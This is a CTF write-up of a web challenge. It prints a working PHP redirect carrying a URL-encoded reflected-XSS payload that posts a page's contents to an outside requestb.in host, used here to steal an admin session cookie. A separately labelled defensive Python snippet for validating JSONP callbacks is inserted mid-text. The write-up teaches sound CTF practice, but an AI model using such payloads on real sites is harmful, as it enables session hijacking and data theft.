[HITB CTF Singapore 2017] Web 434 – Website

Challenge:

No description
http://47.88.218.105:20010/

The login form! We create an account and log in, and the challenge begins!

Obviously we click "get flag", but it requires us to be admin. There is one clear point for us to attack: the "personal website" field.

So we need to create an XSS somewhere and trick the admin into accessing it.

After surfing around, I found something good:

Change "getInfo" to some random characters and it is printed back unescaped, so how about an XSS payload?
Great!

So construct a redirect payload that carries the cookie, send it to the admin to steal his cookie, and the challenge is solved? Nope!

The length is limited to 50 chars, so we can't send it directly!
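As an added defensive example (not from the original post or the challenge code), here is how a JSONP-style endpoint can validate the callback name so that a reflected payload like the one above is rejected outright; the function names and the allowed identifier pattern are my assumptions.

```python
import json
import re

# Constructed rule: a JSONP callback must look like a JavaScript identifier
# path (e.g. "getInfo" or "app.cb_1") and nothing else. A length cap alone is
# not a defence: the challenge's 50-char limit was bypassed with a redirect.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")
MAX_CALLBACK_LEN = 50


def is_valid_callback(name: str) -> bool:
    """Return True only for a plain identifier path; tags, quotes, spaces fail."""
    return len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def jsonp_response(callback: str, payload: dict) -> tuple:
    """Build (status, headers, body) for a JSONP reply.

    The callback is echoed only after it passed validation, and the headers
    keep the reply from being rendered as HTML if it is opened directly.
    """
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment; filename=f.txt",
    }
    if not is_valid_callback(callback):
        # Never reflect the rejected value anywhere in the response.
        return 400, headers, "/* invalid callback */"
    # Escape angle brackets inside the JSON too, so data cannot close a script context.
    body = json.dumps(payload).replace("<", "\\u003c").replace(">", "\\u003e")
    return 200, headers, f"/**/{callback}({body});"
```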

It's SSRF TIMEEEEEE!

The idea is to create our own PHP page which redirects whoever visits it to the XSS page above!

I created index.php at /var/www/html/tsu/ like this:

<?php
// Redirect whoever visits this page to the reflected "callback" XSS on the challenge host
header("Location: http://47.88.218.105:20010/action.php?callback=%3Cscript%20src%3D%22https%3A%2f%2fajax.googleapis.com%2fajax%2flibs%2fjquery%2f2.1.3%2fjquery.min.js%22%3E%3C%2fscript%3E%3Cscript%3E%20%24.get%28%27%2floged.php%27%2Cfunction%28data%29%7B%24.post%28%27https%3A%2f%2frequestb.in%2fr0uyoer0%3Finsp%3D%27%2C%7Bname%3Adata%7D%29%3B%7D%29%3B%20%3C%2fscript%3E");

Send my host to the admin: https://meepwn.team/tsu/

Wait a few seconds, and got it! The PHPSESSID of the admin, but... we need the "username" cookie to become admin. Unfortunately, the HttpOnly flag is set on it, so we can't steal it.

The only way to get the flag is to trick the admin into clicking "get flag" himself and sending the flag back to us. That means we have to get the CSRF token and make the request with it.

I don't practice much with XSS, so this stage bothered me. Luckily, I have a very good XSS-in-action teammate, @quynhnhu,
and he did it well. Here is the script:

https://pastebin.com/TqdGcYjP

We got the flag!
